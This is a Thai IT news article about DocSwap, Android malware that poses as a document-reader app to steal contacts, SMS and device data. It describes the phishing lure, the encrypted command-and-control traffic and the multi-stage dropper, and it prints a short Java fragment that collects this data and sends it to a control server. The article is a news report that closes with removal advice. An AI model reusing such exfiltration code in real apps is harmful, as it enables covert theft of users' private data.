ดาวน์โหลดโปรแกรมฟรี
       
   สมัครสมาชิก   เข้าสู่ระบบ
ข่าวไอที
 

มัลแวร์ DocSwap ปลอมตัวเป็นแอปอ่านไฟล์เอกสาร กำลังระบาดบน Android อย่างหนัก

มัลแวร์ DocSwap ปลอมตัวเป็นแอปอ่านไฟล์เอกสาร กำลังระบาดบน Android อย่างหนัก

เมื่อ :
|  ผู้เข้าชม : 1,183
เขียนโดย :
0 %E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C+DocSwap+%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%A1%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B9%81%E0%B8%AD%E0%B8%9B%E0%B8%AD%E0%B9%88%E0%B8%B2%E0%B8%99%E0%B9%84%E0%B8%9F%E0%B8%A5%E0%B9%8C%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3+%E0%B8%81%E0%B8%B3%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%B2%E0%B8%94%E0%B8%9A%E0%B8%99+Android+%E0%B8%AD%E0%B8%A2%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%81
A- A+
แชร์หน้าเว็บนี้ :

มัลแวร์กับ Android เรียกได้ว่าเป็นของที่คู่กันไปแล้ว และมักจะมีข่าวออกมาถึงการปรากฏของมัลแวร์ตัวใหม่ ๆ ทุกสัปดาห์ และสำหรับข่าวนี้ก็เช่นเดียวกัน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้รายงานถึงการตรวจพบแคมเปญการกระจายมัลแวร์ตัวใหม่บนระบบปฏิบัติการ Android ที่มีชื่อว่า DocSwap โดยแอบอ้างตัวเองว่าเป็นแอปพลิเคชันสำหรับใช้ในการอ่านไฟล์เอกสารอย่างปลอดภัย แต่แท้จริงเป็นมัลแวร์ที่ใช้ในการขโมยข้อมูลจากเครื่องของเหยื่อ

บทความเกี่ยวกับ Malware อื่นๆ

โดยแฮกเกอร์ที่อยู่เบื้องหลังมัลแวร์ดังกล่าวนั้นจะใช้การหลอกลวงด้วยวิธีการที่เรียกว่าวิศวกรรมทางสังคม (Social Engineering) ด้วยการส่งอีเมล Phishing หรือส่งตัวเว็บไซต์ให้ โดยโฆษณาหลอกลวงว่ามีแอปพลิเคชันที่ใหม่ที่ช่วยอ่านไฟล์ที่ถูกสร้างด้วยซอฟต์แวร์ Offices แบบต่าง ๆ เช่น Doc หรือ XlS หรือไฟล์เอกสารแบบ PDF อย่างปลอดภัยได้

ทว่า พอเหยื่อทำการติดตั้งแอปพลิเคชันดังกล่าวสำเร็จ ตัวแอปพลิเคชันจะทำการร้องขอให้ผู้ใช้งานทำการอนุมัติสิทธิ์ในการเข้าถึงระบบ รวมไปถึงการเข้าถึงรายชื่อผู้ติดต่อที่ถูกบันทึกไว้บนเครื่อง (Contact List), แหล่งเก็บไฟล์ (Storage), และ ข้อความสั้น (SMS หรือ Short Message Service) หลังจากนั้นก็จะทำการติดต่อการเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ที่มักตั้งอยู่ในแถบยุโรปและเอเชียตะวันออกเฉียงใต้ผ่านทางการสื่อสารแบบเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับจากระบบรักษาความปลอดภัยบนเครื่องเพื่อรอรับคำสั่งจากทางแฮกเกอร์ต่อไป ซึ่งในการสื่อสารนั้นตัวมัลแวร์ยังได้มีการใช้ Protocol การสื่อสารเพื่อปลอมแปลงการขนส่งข้อมูลให้เหมือนกับรูปแบบการรับส่งข้อมูลของเว็บไซต์แบบ HTTPs แบบทั่วไปเพื่อหลอกลวงระบบการตรวจจับอีกด้วย โดยทางทีมวิจัยได้ระบุว่า มัลแวร์ดังกล่าวนี้ปัจจุบันกำลังระบาดอยู่ในหลายทวีปไม่ว่าจะเป็น เอเชีย, ยุโรป, และอเมริกาเหนือ ในตลอด 3 สัปดาห์ที่ผ่านมา

นอกจากนั้นแล้ว ทางทีมวิจัยยังพบว่าตัวมัลแวร์นั้นมีการนำเอาเทคนิคการตีรวนระบบรักษาความปลอดถัย (Obfuscation) เข้ามาใช้งานอีกด้วย ด้วยการหลังจากที่รันขึ้นมา ตัวแอปปลอมจะทำการโชว์ฟีเจอร์ในการอ่านไฟล์ต่าง ๆ แต่เบื้องหลังนั้นกลับเป็นการดาวน์โหลด และรันตัวมัลแวร์ (Payload) ทำให้การตรวจจับโดยระบบ และจากผู้ใช้งานงานเองนั้นทำได้ยากยิ่งขึ้น

ไม่เพียงเท่านั้น ตัวมัลแวร์ยังใช้รูปแบบการติดตั้งแบบหลายชั้น (Multi-Stage Infection) โดยตัวที่ติดตั้งตัวแรกจะทำหน้าที่เป็นมัลแวร์นกต่อ (Dropper) เพื่อใช้ในการดาวน์โหลดมัลแวร์ (Payload) อีกตัวลงมา ซึ่งตัวมัลแวร์นกต่อนี่จะมีการแฝง Payload แบบเข้ารหัสไว้ โดยจะมีการคลายไฟล์ออกมาหลังจากที่ครบเวลาในการรอ (Delay) ตามที่ตัวมัลแวร์ได้กำหนดไว้ เพื่อทำการหลบเลี่ยงการใช้เทคนิคการวิเคราะห์ด้วยการจำลองระบบการทำงานที่น่าสงสัย หรือ Sandbox Analysis โดยนักวิเคราะห์มัลแวร์ รวมไปถึงหลีกเลี่ยงการถูกสแกนด้วยเครื่องมือรักษาความปลอดภัยแบบ Dynamic Scanning Tools อีกด้วย

นอกจากนั้นแล้ว ทางทีมวิจัยยังพบว่าฟังก์ชันการทำงานของมัลแวร์ DocSwap นั้นมีการใช้ประโยชน์จาก Native Library เพื่อรันโค้ดดังต่อไปนี้อีกด้วย

private void exfiltrateData() {

    String deviceInfo = getDeviceInfo();

    String contactsList = getContacts();

    String smsData = getMessages();

    new AsyncTask() {

        @Override

        protected Void doInBackground(Void... params) {

            sendToC2Server(encryptData(deviceInfo + contactsList + smsData));

            return null;

        }

    }.execute();

}

ทางแหล่งข่าวนั้นได้แนะนำว่า ถ้าใครสงสัยว่าได้มีการติดตั้งแอปพลิเคชันอันตรายดังกล่าวลงไป ให้ทำการลบทิ้งในทันที รวมทั้งใช้เครื่องมือรักษาความปลอดภัยรุ่นล่าสุดในการสแกนเครื่องแบบเต็มรูปแบบ (Full Scan) เพื่อลบไฟล์อันตรายต่าง ๆ บนเครื่องอย่างสิ้นซาก


ที่มา : cybersecuritynews.com

0 %E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C+DocSwap+%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%A1%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B9%81%E0%B8%AD%E0%B8%9B%E0%B8%AD%E0%B9%88%E0%B8%B2%E0%B8%99%E0%B9%84%E0%B8%9F%E0%B8%A5%E0%B9%8C%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3+%E0%B8%81%E0%B8%B3%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%B2%E0%B8%94%E0%B8%9A%E0%B8%99+Android+%E0%B8%AD%E0%B8%A2%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%81
แชร์หน้าเว็บนี้ :
Keyword คำสำคัญ »
เขียนโดย
นักเขียน : Editor    นักเขียน
 
 
 

ข่าวไอทีที่เกี่ยวข้อง

 


 

แสดงความคิดเห็น